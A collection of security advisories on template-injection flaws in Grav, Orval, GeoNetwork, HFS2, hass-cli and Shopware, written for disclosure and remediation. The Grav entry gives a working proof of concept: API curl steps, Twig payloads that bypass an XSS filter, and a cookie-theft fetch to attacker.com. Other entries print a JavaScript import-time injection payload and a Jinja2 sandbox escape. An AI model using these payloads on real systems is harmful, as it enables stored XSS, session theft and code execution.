Summary
Grav: XSS Blueprint Validation Bypass via Twig String Concatenation
Details

Summary

The XSS blueprint validator (Security::detectXss()) runs on the raw page content before Twig processing. An attacker can use Twig's string concatenation operator (~) to dynamically construct an event handler name at render time. The validator sees {{ "on" ~ "error" }} - a harmless Twig expression - and allows the content. After Twig processes the template, the output contains <img src=1 onerror=alert(1)> which is rendered via {{ content|raw }} and executes in the victim's browser.

Details

The two-stage attack exploits the separation between validation and rendering:

Stage 1 - what the XSS validator sees (raw page content):

{% set x = "on" ~ "error" %}
<img src=1 {{ x }}=alert(document.domain)>

The detectXss() function scans this string. The on_events regex looks for <[^>]*?[\s\x00-\x20\"\'\/](on\s*[a-z]+|xmlns)\s*= inside HTML tags. In {{ x }}, the { character is not in the boundary set [\s\x00-\x20\"\'\/], and x is not on. No match - passes validation.

Stage 2 - what Twig produces (after rendering):

<img src=1 onerror=alert(document.domain)>

The validator never re-inspects Twig output. The theme template renders this via {{ page.content|raw }} (confirmed in quark2/templates/default.html.twig:5), so no auto-escaping occurs.

Why {% set %} and ~ are allowed - system/config/security.yaml:125-145:

allowed_tags:
  - set          # ← allows variable assignment
  ...

The ~ operator is a core Twig operator for string concatenation (like . in PHP). It is not a function, filter, or tag — it is always available and not gated by the sandbox.

The same technique bypasses the dangerous_tags blocklist - any blocked tag name can be reconstructed:

<s{{"c"~"r"~"i"~"p"~"t"}}>alert(1)</s{{"c"~"r"~"i"~"p"~"t"}}>
{# XSS validator sees: <s{{...}}> - no <script> tag detected
   Twig output: <script>alert(1)</script> #}

Also bypasses the invalid_protocols check:

<a href="{{"java"~"script"}}:alert(1)">click</a>
{# Validator sees: href="{{...}}" - no "javascript:" protocol detected #}

Proof of Concept

Prerequisites

  1. twig_content.process_enabled: true set by admin
  2. api.pages.write permission (page creation)

Step 1 - Obtain JWT token (any user with page write access)

JWT=$(curl -s http://127.0.0.1/grav/api/v1/auth/token \
  -X POST -H "Content-Type: application/json" \
  -d '{"username":"user","password":"pass"}' \
  | python3 -c "import json,sys; print(json.load(sys.stdin)['data']['access_token'])")

Step 2 - Create page with Twig XSS payload

curl -s http://127.0.0.1/grav/api/v1/pages -X POST \
  -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" \
  -d '{
    "title": "xss-page",
    "folder": "xss-page",
    "route": "/xss-page",
    "template": "default",
    "header": {"title": "xss", "process": {"markdown": false}},
    "content": "{% set x = \"on\" ~ \"error\" %}<img src=1 {{ x }}=alert(document.domain)>"
  }'

Result: 201 Created - XSS validator passes because it sees {{ x }}, not onerror.

Step 3 - Visit page → XSS fires

curl -s http://127.0.0.1/grav/xss-page | grep -oP '<img[^>]*>'
# Output: <img src=1 onerror=alert(document.domain)>

Open in browser: http://127.0.0.1/grav/xss-page - alert(document.domain) fires. image image

From a low-level user

Also From a low-level user normal script such as <img src=1 onerror=alert(1)> this is being blocked by the restriction. image

But with payloads such as click proves that the we can bypass the blueprint restrictions and upload malicious script to it image image

Alternative payloads (all bypass the validator)

Payload Twig Source After Twig Triggers
Event handler <img src=1 {{"on"~"error"}}=alert(1)> <img src=1 onerror=alert(1)> Image load fails
Script tag <s{{"c"~"r"~"i"~"p"~"t"}}>alert(1)</s{{"c"~"r"~"i"~"p"~"t"}}> <script>alert(1)</script> Immediately
Protocol bypass <a href="{{"java"~"script"}}:alert(1)">click</a> <a href="javascript:alert(1)">click</a> On click
Iframe onload <i{{"f"~"r"~"a"~"m"~"e"}} {{"on"~"load"}}=alert(1)> <iframe onload=alert(1)> Page load
Details toggle <details open {{"on"~"toggle"}}=alert(1)> <details open ontoggle=alert(1)> Page load
Cookie theft <img src=1 {{"on"~"error"}}=fetch("https://attacker.com/?c="+document.cookie)> <img src=1 onerror=fetch(...)> Image load fails

Admin preview caveat

The Admin2 SPA renders page previews inside a sandboxed iframe:

<iframe sandbox="allow-same-origin allow-scripts allow-forms"></iframe>

allow-modals is not set - alert() is silenced in the admin preview. Use fetch(), document.write(), or DOM manipulation payloads to prove execution in the admin panel. The frontend page (no iframe) has no such restriction - alert() fires directly.

Impact

Once the Twig content master gate is enabled by an administrator, any user with page write access can inject stored XSS into page content that executes for all visitors. The attack:

  • Bypasses all four XSS validator regexes (on_events, invalid_protocols, dangerous_tags, html_inline_styles)
  • Bypasses the dangerous tag blocklist (reconstructs <script>, <iframe>, <svg>, etc.)
  • Bypasses the invalid protocol blocklist (reconstructs javascript:, data:)
  • Persists across page edits (stored in page content file)
  • Executes for every visitor to the page

An attacker can steal session cookies, perform actions as the victim, or deface the site.

Remediation

Option A - Re-run the XSS validator on Twig output

After Twig::processPage() renders the content, run the XSS validator on the output before it is cached and served:

// In Twig::processPage(), after rendering
$rendered = $twig->render($name, $context);
$result = Security::detectXss($rendered);
if ($result !== null) {
    // Log and sanitize or block
    Security::logTwigSandboxViolation('xss_output', $result, '', $route);
    return ''; // or return escaped version
}

Option B - Disallow ~ and {% set %} in sandboxed content (too restrictive)

Removing string concatenation or variable assignment from the sandbox would break legitimate use cases (e.g., building dynamic class names, assembling URLs).

Option C - Block dynamic attribute names in Twig output

Parse the Twig output for HTML and check if any event handler attributes were dynamically constructed. This is complex but comprehensive.

Option D - Escape HTML in rendered Twig output

Wrap the rendered output with htmlspecialchars() unless explicitly marked safe. This is the Twig default behavior — the |raw filter in theme templates bypasses it. Consider removing |raw from default themes and requiring explicit |raw only for trusted content.

Summary
Orval: Import-time RCE via array-items default -> zod module-level template literal
Details

Summary

Orval's zod schema generation emits the array-items default value as a module-level template literal (export const …Default =;) without escaping ${ or the backtick. A default of the form v${<code>}w injects a live JavaScript expression evaluated when the generated zod schema module is imported, executing attacker-controlled code at import — no request or function call needed. Verified on Orval 8.19.0; survives default OpenAPI validation.

Details

export const …Default = `v${globalThis.ORVPWN()}w`;   // ${...} = arbitrary JS expression, runs at import

Malicious input: an array property (string items) with a default of v${<attacker JS>}w. ${...} permits any JS expression.

Note: this is one of several default-bearing positions that reach the same unescaped zod template-literal sink; a single fix (escape default values) closes all of them, and a CNA may choose to consolidate the related reports.

PoC

reproduce.sh (+ make_spec.py) attached: generates the zod schema with default validation, bundles it, imports it, and shows a marker written at import. Verified on 8.19.0.

Impact

Code execution at import in any application that imports a zod schema module generated from an attacker-controlled or attacker-influenced OpenAPI description.

Suggested fix

Emit default values via a proper string-literal encoder (JSON.stringify, or escape backtick and ${ if a template literal must be used); never interpolate a spec value into a template literal. Apply to every default position. maintainer-report.txt make_spec.pyreproduce.sh

Verified on Orval 8.19.0; survives default OpenAPI validation.\n\n### Details\n\n```ts\nexport const \u2026Default = `v${globalThis.ORVPWN()}w`; // ${...} = arbitrary JS expression, runs at import\n```\n\nMalicious input: an array property (string items) with a `default` of `v${\u003cattacker JS\u003e}w`. `${...}` permits any JS expression.\n\nNote: this is one of several `default`-bearing positions that reach the same unescaped zod template-literal sink; a single fix (escape `default` values) closes all of them, and a CNA may choose to consolidate the related reports.\n\n### PoC\n\n`reproduce.sh` (+ `make_spec.py`) attached: generates the zod schema with default validation, bundles it, imports it, and shows a marker written at import. Verified on 8.19.0.\n\n### Impact\n\nCode execution at import in any application that imports a zod schema module generated from an attacker-controlled or attacker-influenced OpenAPI description.\n\n### Suggested fix\n\nEmit `default` values via a proper string-literal encoder (JSON.stringify, or escape backtick and `${` if a template literal must be used); never interpolate a spec value into a template literal. Apply to every `default` position. Details

grav-plugin-api versions before 1.0.15 fail to validate Twig content in the translate() endpoint, allowing attackers with api.pages.write permission to persist pages with process.twig enabled. Attackers can submit crafted header and content parameters to execute server-side template injection payloads that are evaluated at render time.

Vulnerability from github – Published: 2026-07-01 17:56 – Updated: 2026-07-01 17:56

Summary
GeoNetwork has reflected XSS through client-side template injection
Details

Summary

It is possible to craft a URL that causes GeoNetwork to reflect attacker-controlled content into an error page in a way that gets evaluated as a client-side template expression. Combined with known AngularJS sandbox-escape techniques, this can be used to execute arbitrary JavaScript in the victim's browser (reflected Cross-Site Scripting via client-side template injection).

Details

When a user requests a service URL that does not exist or that they are not authorized to access, GeoNetwork shows an error page that reflects part of the original request back to the user without adequately neutralizing it for the context it is rendered in. Because this error page is an AngularJS application, attacker-controlled content in the reflected value can be interpreted as a template expression and evaluated once the page loads in the victim's browser, rather than being displayed as inert text.

Impact

An attacker can trick a user (including an administrator) into visiting a crafted link. The resulting script execution runs in the context of the victim's authenticated session and can be used to exfiltrate information or perform actions on the victim's behalf. For example, an attacker could inject a fake login form that looks identical to the legitimate GeoNetwork login page to harvest credentials.

GeoNetwork 3.x and 4.0.x are archived/unmaintained and will not receive a fix for this issue. Instances running those lines should upgrade to a supported release (4.2.15 or later, or 4.4.10 or later).

Details

HFS2 version 2.4.0 and earlier contains a template injection vulnerability in the multipart upload handler that allows unauthenticated attackers to achieve remote code execution by embedding malicious template syntax in a filename. Attackers can craft a filename containing a closing template quoting sequence followed by an exec macro, which bypasses the authorization check in the dispatcher to execute arbitrary commands on the underlying host system.

Summary
Home Assistant Command-line Interface: Handling of user-supplied Jinja2 templates
Details

Impact

Up to 1.0.0 of home-assitant-cli (or hass-cli for short) an unrestricted environment was used to handle Jninja2 templates instead of a sandboxed one. The user-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage.

E. g., it was possible to render a template with hass-cli template bad-template.j2 --local that contained entries like

{%- set b   = environ.__globals__['__builtins__'] -%}
{%- set os  = b['__import__']('os') -%}
{%- set bio = b['__import__']('builtins') -%}
...

or other malicious Jinja2 expressions. This can lead to arbitrary code execution on the local machine.

In a two step process an adversary could trick/convince an user to download third-party templates which contain harmful code (e. g., perform data manipulation or establish a remote shell) then to render those templates unchecked/reviewed/verified with --local.

The issue only affect the local machine and not a remote Home Assistant instance. It also requires user interventions.

Patches

1.0.0 uses ImmutableSandboxedEnvironment and restricts the usage of environment variables.

Workarounds

Evaluate the Jninja2 templates manually or tool-based before rendering with hass-cli.

Summary
Orval: Import-time RCE via enum-typed default -> zod module-level template literal
Details

Summary

Orval's zod schema generation emits the enum-typed default value as a module-level template literal (export const …Default =;) without escaping ${ or the backtick. A default of the form v${<code>}w injects a live JavaScript expression evaluated when the generated zod schema module is imported, executing attacker-controlled code at import — no request or function call needed. Verified on Orval 8.19.0; survives default OpenAPI validation.

Details

export const …Default = `v${globalThis.ORVPWN()}w`;   // ${...} = arbitrary JS expression, runs at import

Malicious input: an enum-typed property with a default of v${<attacker JS>}w.

Summary
Shopware vulnerable to Server Side Template Injection in Twig using Context functions
Details

Impact

The context variable is injected into almost any Twig Template and allows to access to current language, currency information. The context object allows also to switch for a short time the scope of the Context as a helper with a callable function.

Example call from PHP:

$context->scope(Context::SYSTEM_SCOPE, static function (Context $context) use ($mediaService, $media, &$fileBlob): void {
    $fileBlob = $mediaService->loadFile($media->getId(), $context);
});

This function can be called also from Twig and as the second parameter allows any callable, it's possible to call from Twig any statically callable PHP function/method.

It's not possible as customer to provide any Twig code, the attacker would require access to Administration to exploit it using Mail templates or using App Scripts.

Patches

Update to Shopware 6.6.5.1 or 6.5.8.13

Workarounds

For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
